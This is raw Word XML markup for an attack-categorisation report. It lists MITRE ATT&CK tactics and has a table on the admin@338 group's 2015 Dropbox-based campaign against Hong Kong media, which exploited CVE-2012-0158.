          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007407B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13206C90"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lateral Movement </w:t>
      </w:r>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF1806A"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Collection</w:t>
      </w:r>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D853E1"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Command and Control </w:t>
      </w:r>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A168B65" w14:textId="77777777" w:rsidR="005B3C56" w:rsidRPr="005B3C56"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exfiltration</w:t>
      </w:r>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09407391" w14:textId="5DEE856B" w:rsidR="005B3C56" w:rsidRPr="005935F8" w:rsidRDefault="005B3C56" w:rsidP="005B3C56">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B461B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="005B3C56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9EB07B" w14:textId="5AE44E89" w:rsidR="005B4630" w:rsidRDefault="00F978F9" w:rsidP="005B4630">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc110935496"/>
      <w:bookmarkStart w:id="16" w:name="_Toc153480835"/>
      <w:r>
        <w:t xml:space="preserve">T1566.001 - </w:t>
      </w:r>
      <w:r w:rsidR="005B4630" w:rsidRPr="005B4630">
        <w:t>China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="5B821DC6" w14:textId="033688B3" w:rsidR="00C94979" w:rsidRDefault="00C94979" w:rsidP="00C94979">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc110935497"/>
      <w:r>
        <w:t>Attack Categorisation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="3119"/>
        <w:gridCol w:w="2551"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC7A85" w:rsidRPr="002D1D50" w14:paraId="3DCE3B81" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="156ACA1F" w14:textId="23783D51" w:rsidR="00AC7A85" w:rsidRPr="002D1D50" w:rsidRDefault="00AC7A85" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CD8B5A5" w14:textId="77777777" w:rsidR="00AC7A85" w:rsidRPr="002D1D50" w:rsidRDefault="00AC7A85" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="572B93B4" w14:textId="77777777" w:rsidR="00AC7A85" w:rsidRPr="00387DCC" w:rsidRDefault="00AC7A85" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C045CA" w:rsidRPr="00B857D7" w14:paraId="0AD699C3" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="060C7524" w14:textId="77777777" w:rsidR="00C045CA" w:rsidRDefault="00C045CA" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26F69C07" w14:textId="26F78DFC" w:rsidR="00C045CA" w:rsidRDefault="00C045CA" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>admin@338</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DCC89FD" w14:textId="77777777" w:rsidR="00C045CA" w:rsidRPr="00387DCC" w:rsidRDefault="00C045CA" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC7A85" w:rsidRPr="00B857D7" w14:paraId="65EFA309" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BCD98E9" w14:textId="341F9A6F" w:rsidR="00AC7A85" w:rsidRPr="007328DE" w:rsidRDefault="007328DE" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="096FDC58" w14:textId="77777777" w:rsidR="00AC7A85" w:rsidRPr="007328DE" w:rsidRDefault="00AC7A85" w:rsidP="006B7A00">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6CADE323" w14:textId="77777777" w:rsidR="00AC7A85" w:rsidRPr="00387DCC" w:rsidRDefault="00AC7A85" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007328DE" w:rsidRPr="00B857D7" w14:paraId="2D6A3F7E" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23AC38FC" w14:textId="6AE3880A" w:rsidR="007328DE" w:rsidRDefault="007328DE" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2112F0AB" w14:textId="3345349D" w:rsidR="007328DE" w:rsidRPr="007328DE" w:rsidRDefault="00897273" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>China</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EA790C8" w14:textId="77777777" w:rsidR="007328DE" w:rsidRPr="00387DCC" w:rsidRDefault="007328DE" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00897273" w:rsidRPr="00B857D7" w14:paraId="0FB4DA58" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20D89C3B" w14:textId="56F59158" w:rsidR="00897273" w:rsidRDefault="00387DCC" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30EE58D1" w14:textId="07965D12" w:rsidR="00897273" w:rsidRDefault="001B461B" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Hong Kong</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42D20FCC" w14:textId="36C8C6F7" w:rsidR="00897273" w:rsidRPr="00387DCC" w:rsidRDefault="00897273" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00387DCC" w:rsidRPr="00B857D7" w14:paraId="15023C01" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47FD03A2" w14:textId="7CB78C47" w:rsidR="00387DCC" w:rsidRDefault="00387DCC" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="508134D8" w14:textId="2232FA5E" w:rsidR="00387DCC" w:rsidRDefault="001B461B" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07D517E4" w14:textId="16398E45" w:rsidR="00387DCC" w:rsidRPr="00387DCC" w:rsidRDefault="00387DCC" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00387DCC" w:rsidRPr="00B857D7" w14:paraId="6C9F9B91" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29F6B7B0" w14:textId="258B86D3" w:rsidR="00387DCC" w:rsidRDefault="00387DCC" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78F1971A" w14:textId="49AE741F" w:rsidR="00387DCC" w:rsidRDefault="00202BFD" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="673EBB2D" w14:textId="252EFFE3" w:rsidR="00387DCC" w:rsidRDefault="00202BFD" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Monitoring media orgs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00387DCC" w:rsidRPr="00B857D7" w14:paraId="1C804AB5" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E9D1D50" w14:textId="59121269" w:rsidR="00387DCC" w:rsidRDefault="00387DCC" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C7A4DC4" w14:textId="28B7BC5C" w:rsidR="00387DCC" w:rsidRDefault="00387DCC" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CVE-2012-0158</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B0651E3" w14:textId="77777777" w:rsidR="00387DCC" w:rsidRDefault="00387DCC" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00387DCC" w:rsidRPr="00B857D7" w14:paraId="16A47252" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E23A780" w14:textId="4003A44E" w:rsidR="00387DCC" w:rsidRDefault="00387DCC" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68DDCC83" w14:textId="77777777" w:rsidR="00387DCC" w:rsidRDefault="00387DCC" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FFBB6E7" w14:textId="2F9DC773" w:rsidR="00387DCC" w:rsidRDefault="00387DCC" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947A0B" w:rsidRPr="00B857D7" w14:paraId="766F4150" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50442E7F" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62B89055" w14:textId="51904BA9" w:rsidR="00947A0B" w:rsidRDefault="00B458B7" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D85F0AF"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4A7F43B0" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25298ECE" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46582850" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F0F56BC" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D46DB" w:rsidRPr="00B857D7" w14:paraId="2BA13EDE" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F770BA4" w14:textId="21D88B5F" w:rsidR="003D46DB" w:rsidRDefault="003D46DB" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15068871" w14:textId="5A97287F" w:rsidR="003D46DB" w:rsidRDefault="003D46DB" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2015</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36AD2640" w14:textId="77777777" w:rsidR="003D46DB" w:rsidRDefault="003D46DB" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00387DCC" w:rsidRPr="00B857D7" w14:paraId="09974737" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73E7E960" w14:textId="77777777" w:rsidR="00387DCC" w:rsidRDefault="00387DCC" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22F0F5CC" w14:textId="77777777" w:rsidR="00387DCC" w:rsidRDefault="00387DCC" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1112641C" w14:textId="77777777" w:rsidR="00387DCC" w:rsidRDefault="00387DCC" w:rsidP="006B7A00">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E26E6A2" w14:textId="77777777" w:rsidR="00AC7A85" w:rsidRPr="00AC7A85" w:rsidRDefault="00AC7A85" w:rsidP="00AC7A85"/>
